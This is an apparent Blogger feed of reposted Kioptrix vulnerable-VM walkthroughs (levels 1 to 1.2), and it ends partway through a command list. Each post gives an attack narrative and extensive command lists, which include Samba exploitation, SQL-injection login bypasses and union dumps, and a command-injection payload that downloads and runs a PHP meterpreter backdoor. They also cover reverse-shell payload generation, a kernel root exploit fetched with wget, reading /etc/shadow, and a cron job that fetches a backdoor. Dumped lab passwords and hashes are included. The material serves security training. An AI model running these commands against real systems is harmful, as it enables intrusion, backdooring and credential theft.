use linux/samba/trans2open&lt;br /&gt;
#info&lt;br /&gt;
show options&lt;br /&gt;
set RHOST 192.168.0.111&lt;br /&gt;
show options&lt;br /&gt;
exploit&lt;br /&gt;
#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E    #PAYLOAD=linux/x86/shell_bind_tcp&lt;br /&gt;
&lt;br /&gt;
id&lt;br /&gt;
uname -a&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
cat /etc/issue&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2069837305414950376?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2069837305414950376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2069837305414950376'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-kioptrix-level-1.html' title='HOWTO : Kioptrix - Level 1'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-919087417675336140</id><published>2011-09-11T23:02:00.002+08:00</published><updated>2011-09-11T23:02:43.141+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>HOWTO : Kioptrix - Level 1.1</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/38313-%5Bvideo%5D-kioptrix-level-2-injection.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Links&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/4760142/"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?f3hbmtdt44t44v3"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Time for level 2! Like before, &lt;a href="http://www.kioptrix.com/blog/"&gt;kioptrix&lt;/a&gt; is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.&lt;br /&gt;
&lt;br /&gt;
This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Scan network for hosts (Nmap)&lt;br /&gt;
Bypass login screen (MySQL Injection)&lt;br /&gt;
Local command execution (PHP Injection)&lt;br /&gt;
Upload a backdoor (PHP Meterpreter)&lt;br /&gt;
Gain root access (ip_append_data() local ring0 root exploit)&lt;br /&gt;
Game Over&lt;br /&gt;
Enable access to MySQL database (MySQL Injection)&lt;br /&gt;
Gather information (history and user credentials)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)&lt;br /&gt;
VMware player OR workstation. Download here&lt;br /&gt;
Nmap – (Can be found on BackTrack 4-R2). Download here&lt;br /&gt;
Metasploit – (Can be found on BackTrack 4-R2)&lt;br /&gt;
Internet Browser – (Firefox can be found on BackTrack 4-R2)&lt;br /&gt;
A Text Editor – (Kate can be found on BackTrack 4-R2)&lt;br /&gt;
ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)&lt;br /&gt;
MySQL – (Can be found on BackTrack 4-R2)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walk through&lt;/b&gt; *Due to the forums security, I'm unable to post the complete walk through*&lt;br /&gt;
&lt;br /&gt;
After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:&lt;br /&gt;
&lt;br /&gt;
* OS: Linux v2.6.x (2.6.9-30)&lt;br /&gt;
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)&lt;br /&gt;
&lt;br /&gt;
The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:&lt;br /&gt;
&lt;br /&gt;
* Original command&lt;br /&gt;
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";&lt;br /&gt;
&lt;br /&gt;
* Expected input (user: admin, Password: 5afac8d85f):&lt;br /&gt;
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";&lt;br /&gt;
&lt;br /&gt;
* "Injected" input (user: admin, Password: ' OR 1=1 -- -):&lt;br /&gt;
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";&lt;br /&gt;
&lt;br /&gt;
This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.&lt;br /&gt;
&lt;br /&gt;
The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.&lt;br /&gt;
&lt;br /&gt;
The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:&lt;br /&gt;
&lt;br /&gt;
* Original command&lt;br /&gt;
echo shll_exec( 'ping -c 3 ' . $target );&lt;br /&gt;
&lt;br /&gt;
* Expected input (ip: 192.168.0.1):&lt;br /&gt;
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );&lt;br /&gt;
&lt;br /&gt;
* "Injected" input (ip: ; ** /*** &amp;&amp; **** -O bd.php 192.168.0.33/backdoor.php.txt &amp;&amp; php -f bd.php):&lt;br /&gt;
echo shll_exec( 'ping -c 3 ' . ; ** /*** &amp;&amp; **** -O bd.php 192.168.0.33/backdoor.php.txt &amp;&amp; php -f bd.php );&lt;br /&gt;
&lt;br /&gt;
The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:&lt;br /&gt;
&lt;br /&gt;
* Change directory to "/***" as this is writeable for the exploited user "apache".&lt;br /&gt;
&lt;br /&gt;
* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.&lt;br /&gt;
&lt;br /&gt;
* Then execute the code.&lt;br /&gt;
&lt;br /&gt;
The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.&lt;br /&gt;
&lt;br /&gt;
However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).&lt;br /&gt;
&lt;br /&gt;
As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.&lt;br /&gt;
&lt;br /&gt;
Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.&lt;br /&gt;
&lt;br /&gt;
The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).&lt;br /&gt;
&lt;br /&gt;
The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" &amp; "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!). &lt;br /&gt;
&lt;br /&gt;
After connecting via command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first time, shows what happens if the login details are incorrect, the next login is from a "non admin" but a valid account, and the last login is the valid admin account. When the attacker was injecting it the admin account was not specified, the database would login as the first user, in which in most cases it is the admin account as it is usually the first user that is created.&lt;br /&gt;
&lt;br /&gt;
The attacker can use MySQL to view files however just like before when using PHP injection because the exploited user is a limited account, it has limited access to the system however it is a different user from before, as it now is "mysql" rather than “apache”.&lt;br /&gt;
&lt;br /&gt;
The attacker tests the backdoor in order to get a remote shell again. However it is easier this time as they do not have to go though the hassle of injecting again. The attacker can just execute the php backdoor, this time done by visiting it directly on the web server, which results in the php code being executed.&lt;br /&gt;
&lt;br /&gt;
After gaining access and exploiting the system gain root access, the attacker scans the system for ".mysql_history", which is a file that contains previous entered commands and views the contents when using the "root" account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt; *Due to the forums security, I'm unable to post the complete command list.*&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;start-network &lt;br /&gt;
dhclient eth0 &lt;br /&gt;
clear &lt;br /&gt;
&lt;br /&gt;
nmap 192.168.0.0/24 -n -sn -sP  &lt;br /&gt;
nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v &lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.202 &lt;br /&gt;
-&gt; User: admin &lt;br /&gt;
-&gt; Password: ' OR 1=1 -- - &lt;br /&gt;
&lt;br /&gt;
clear &lt;br /&gt;
msfpayload | grep PHP &lt;br /&gt;
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R &gt; /var/www/backdoor.php.txt &lt;br /&gt;
start-apache &lt;br /&gt;
msfconsole &lt;br /&gt;
use multi/handler &lt;br /&gt;
search php &lt;br /&gt;
set PAYLOAD php/meterpreter/reverse_tcp &lt;br /&gt;
show options &lt;br /&gt;
set LHOST 0.0.0.0 &lt;br /&gt;
set LPORT 8080 &lt;br /&gt;
show options &lt;br /&gt;
exploit -j -z  &lt;br /&gt;
* kate -&gt; /var/www/backdoor.php.txt. Remove "#". Save. &lt;br /&gt;
; ** /*** &amp;&amp; **** -O bd.php 192.168.0.33/backdoor.php.txt &amp;&amp; php -f bd.php &lt;br /&gt;
sessions -l -v  &lt;br /&gt;
sessions -i 1 &lt;br /&gt;
sysinfo &lt;br /&gt;
shell &lt;br /&gt;
uname -a; cat /etc/*-release; id; w &lt;br /&gt;
&lt;br /&gt;
Firefox: Search (exploit.db): Linux Kernel 2.6 -&gt; Download #http://www.exploit-db.com/exploits/9542/ &lt;br /&gt;
cp 9542.c /var/www/escpriv.c &lt;br /&gt;
* cd /tmp&lt;br /&gt;
* wget 192.168.0.33/escpriv.c &lt;br /&gt;
* gcc escpriv.c -o rootMe &lt;br /&gt;
* id &lt;br /&gt;
* ./rootMe &lt;br /&gt;
* id &lt;br /&gt;
* whoami &amp;&amp; cat /etc/issue &lt;br /&gt;
&lt;br /&gt;
* cp bd.php /var/www/html/backdoor.php    # root only on folder! &lt;br /&gt;
^C &lt;br /&gt;
y   #n = interact 0 &amp;&amp; background &lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.202 &lt;br /&gt;
; cat index.php &lt;br /&gt;
-&gt; Right click -&gt; View Source. &lt;br /&gt;
--&gt; User: john &lt;br /&gt;
--&gt; Passowrd: hiroshima &lt;br /&gt;
--&gt; Database: webapp &lt;br /&gt;
; mysql -u john -phiroshima -e "SHOW databases;" &lt;br /&gt;
; mysql -u john -phiroshima -e "USE mysql; SHOW tables;" &lt;br /&gt;
; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;" &lt;br /&gt;
mysql -h 192.168.0.202 -u root &lt;br /&gt;
nmap 192.168.0.202 -sV -p 3306 &lt;br /&gt;
; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.*  TO 'root'@'192.168.0.33';"   #-D mysql #IDENTIFIED BY 'g0tmi1k';" &lt;br /&gt;
nmap 192.168.0.202 -sV -p 3306 &lt;br /&gt;
mysql -h 192.168.0.202 -u root &lt;br /&gt;
SHOW databases; &lt;br /&gt;
USE webapp; SHOW tables; &lt;br /&gt;
SELECT * FROM users; &lt;br /&gt;
#* firefox http://192.168.0.202/ &lt;br /&gt;
#--&gt;Login *fail*, john, admin &lt;br /&gt;
SELECT load_file('/etc/passwd'); &lt;br /&gt;
exit &lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.202/backdoor.php &lt;br /&gt;
sessions -i 2 &lt;br /&gt;
shell &lt;br /&gt;
*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*&lt;br /&gt;
* ** /***; ./rootMe &lt;br /&gt;
* cat /root/.mysql_history &lt;br /&gt;
* cat /etc/shadow &lt;br /&gt;
&lt;br /&gt;
* whoami &amp;&amp; cat /etc/issue &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#---------------------------------------------------------------------  &lt;br /&gt;
MySQL-&gt;history: root:Ha56!blaKAbl [???] &lt;br /&gt;
MySQL-&gt;users:   root:hiroshima    [hash: 5a6914ba69e02807] &lt;br /&gt;
MySQL-&gt;users:   john:hiroshima    [hash: 5a6914ba69e02807] &lt;br /&gt;
MySQL-&gt;WebApp:  admin:5afac8d85f  [Type: Admin] &lt;br /&gt;
MySQL-&gt;WebApp;  john:66lajGGbla   [Type: Non-admin] &lt;br /&gt;
Shadow:         root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7::: &lt;br /&gt;
Shadow:         john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7::: &lt;br /&gt;
Shadow:         harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7::: &lt;br /&gt;
#---------------------------------------------------------------------&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when called from wget on the targets system.&lt;br /&gt;
- The “document root” folder is only writeable by “root”.&lt;br /&gt;
* The attacker did not have to kill the remote shell and could have been executed in it, however this method demonstrates if the backdoor failed to work or if the attacker did not wish to use one for whatever&lt;br /&gt;
reason)&lt;br /&gt;
- When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".&lt;br /&gt;
&lt;br /&gt;
That's all!  See you!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-919087417675336140?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/919087417675336140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/919087417675336140'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-kioptrix-level-11.html' title='HOWTO : Kioptrix - Level 1.1'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5059418085749382381</id><published>2011-09-11T22:42:00.001+08:00</published><updated>2011-09-11T22:44:11.098+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit-DB'/><category scheme='http://www.blogger.com/atom/ns#' term='Unicornscan'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='John the Ripper'/><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><title type='text'>HOWTO : Kioptrix - Level 1.2</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-videos/43762-%5Bvideo%5D-kioptrix-level-3-a.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://blip.tv/g0tmi1k/kioptrix-level-3-5460112"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?4rqe1ek0o75fy7v"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
It's time for round 3 with &lt;a href="http://www.kioptrix.com/blog/"&gt;Kioptrix&lt;/a&gt;'s "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.&lt;br /&gt;
&lt;br /&gt;
The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Scanned network for the host (nmap)&lt;br /&gt;
Added IP address to the host file&lt;br /&gt;
Port scanned the host (unicornscan)&lt;br /&gt;
Banner grabbed the services running on the open ports (nmap)&lt;br /&gt;
Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)&lt;br /&gt;
Enumerated database (manual MySQL injection)&lt;br /&gt;
Reused credentials granting a remote shell&lt;br /&gt;
Poorly configured setting to escape privileges (Unprotected limited root access)&lt;br /&gt;
Uploaded and used a web backdoor (Meterpreter)&lt;br /&gt;
Automated MySQL Injection (SQLMap)&lt;br /&gt;
Alternative method to gain root as well as escaping privileges (Cron Job)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)&lt;br /&gt;
A virtual machine (Example: Virtual Box or VMware Player)&lt;br /&gt;
Nmap – (Can be found on BackTrack 5).&lt;br /&gt;
Unicornscan – (Can be found in BackTrack 5's repository).&lt;br /&gt;
Exploit-DB – (Can be found on BackTrack 5).&lt;br /&gt;
John The Ripper – (Can be found on BackTrack 5).&lt;br /&gt;
SQLMap – (Can be found on BackTrack 5).&lt;br /&gt;
Metasploit – (Can be found on BackTrack 5).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.&lt;br /&gt;
&lt;br /&gt;
Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).&lt;br /&gt;
&lt;br /&gt;
Afterwards the attacker executes a TCP &amp; UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).&lt;br /&gt;
&lt;br /&gt;
The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".&lt;br /&gt;
&lt;br /&gt;
One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.&lt;br /&gt;
&lt;br /&gt;
After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".&lt;br /&gt;
&lt;br /&gt;
When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.&lt;br /&gt;
&lt;br /&gt;
The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".&lt;br /&gt;
&lt;br /&gt;
A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.&lt;br /&gt;
&lt;br /&gt;
After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.&lt;br /&gt;
&lt;br /&gt;
With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...&lt;br /&gt;
&lt;br /&gt;
Game over&lt;br /&gt;
&lt;br /&gt;
Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.&lt;br /&gt;
&lt;br /&gt;
By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username &amp; password, in plain text.&lt;br /&gt;
&lt;br /&gt;
(Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)&lt;br /&gt;
&lt;br /&gt;
The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.&lt;br /&gt;
&lt;br /&gt;
After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.&lt;br /&gt;
&lt;br /&gt;
Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.&lt;br /&gt;
&lt;br /&gt;
Game over...again&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap 192.168.0.* -n -sn -sP&lt;br /&gt;
echo 192.168.0.10 kioptrix3.com &gt;&gt; /etc/hosts   # It's in the readme&lt;br /&gt;
cat /etc/hosts&lt;br /&gt;
us -H -msf -Iv kioptrix3.com -p 1-65535 &amp;&amp; us -H -mU -Iv kioptrix3.com -p 1-65535&lt;br /&gt;
nmap -p 1-65535 -T4 -A -v kioptrix3.com&lt;br /&gt;
firefox kioptrix3.com   # Link-&gt; Blog&lt;br /&gt;
http://kioptrix3.com/../etc/passwd.html&lt;br /&gt;
# Gallery --&gt; Source code (gadmin): http://kioptrix3.com/gallery/gadmin/&lt;br /&gt;
cd /pentest/exploits/exploitdb&lt;br /&gt;
grep -i gallarific files.csv&lt;br /&gt;
cat platforms/php/webapps/15891.txt&lt;br /&gt;
firefox kioptrix3.com/gallery/gallery.php&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6&lt;br /&gt;
echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d0  9794d8f021f40f0e" &gt;&gt; /tmp/hashes&lt;br /&gt;
cd /pentest/passwords/john&lt;br /&gt;
./john /tmp/hash --format=raw-md5&lt;br /&gt;
ssh loneferret@kioptrix3.com   # starwars&lt;br /&gt;
id&lt;br /&gt;
pwd&lt;br /&gt;
ls -lA&lt;br /&gt;
cat CompanyPolicy.README&lt;br /&gt;
ls -lh /etc/sudoers&lt;br /&gt;
cat /etc/sudoers&lt;br /&gt;
sudo ht   # starwars   File -&gt; Open: /etc/sudoers -&gt; Edit loneferret: loneferret ALL=(ALL) ALL -&gt; File -&gt; Save&lt;br /&gt;
sudo su   # starwars&lt;br /&gt;
id &amp;&amp; ifconfig &amp;&amp; uname -a &amp;&amp; cat /etc/shadow &amp;&amp; ls -lAh ~/&lt;br /&gt;
cd /etc/apache2/sites-enabled&lt;br /&gt;
ls&lt;br /&gt;
cat * | grep -i documentroot&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
firefox&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6&lt;br /&gt;
http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6&lt;br /&gt;
cd /pentest/database/sqlmap&lt;br /&gt;
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs&lt;br /&gt;
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns&lt;br /&gt;
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords&lt;br /&gt;
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"&lt;br /&gt;
./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump&lt;br /&gt;
http://kioptrix3.com/gallery/gadmin    # admin n0t7t1k4   Upload new pic&lt;br /&gt;
cd /pentest/backdoors/web/webshells&lt;br /&gt;
ls -lAh&lt;br /&gt;
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw &gt; /tmp/evil.jpg    # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R&lt;br /&gt;
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E&lt;br /&gt;
